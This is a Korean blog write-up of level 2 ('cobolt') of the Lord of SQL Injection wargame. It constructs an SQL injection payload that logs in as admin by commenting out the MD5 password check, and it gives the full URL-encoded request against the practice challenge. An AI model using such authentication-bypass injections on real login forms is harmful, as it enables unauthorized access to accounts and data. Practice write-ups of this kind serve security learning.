[LOS] 2번 cobolt 풀이
2019. 7. 29. 14:20ㆍ문제풀이/los.rubiya.kr
id와 pw에서 금지하고 있는 문자는 다음과 같다
prob _ . ()
그리고 query문을 보면 pw는 입력한 값을 md5 방식으로 암호화하여 전송하며,
solve 조건은 result['id']가 admin이라는 것이다.
여기서 md5 방식으로 우회하는건 무시해도 된다. 어차피 우린 1번과 같은 방식으로 풀어서 pw가 필요없게 할거니까!
저번과 똑같은 방식으로 하되, 이번엔 1=1이 아닌 id='admin'을 넣을것이다.
우리가 만들 쿼리문은 다음과 같다.
select id prob_cobolt where id=''or id='admin'-- 'and pw=md5('')
url로 치면 https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%20id=%27admin%27--+
'문제풀이 > los.rubiya.kr' 카테고리의 다른 글
| [LOS] 6번 darkelf 풀이 (0) | 2019.07.29 |
|---|---|
| [LOS] 5번 wolfman 풀이 (0) | 2019.07.29 |
| [LOS] 4번 orc 풀이 (0) | 2019.07.29 |
| [LOS] 3번 goblin 풀이 (0) | 2019.07.29 |
| [LOS] 회원가입 + 1번 Goblin 풀이 (0) | 2019.07.29 |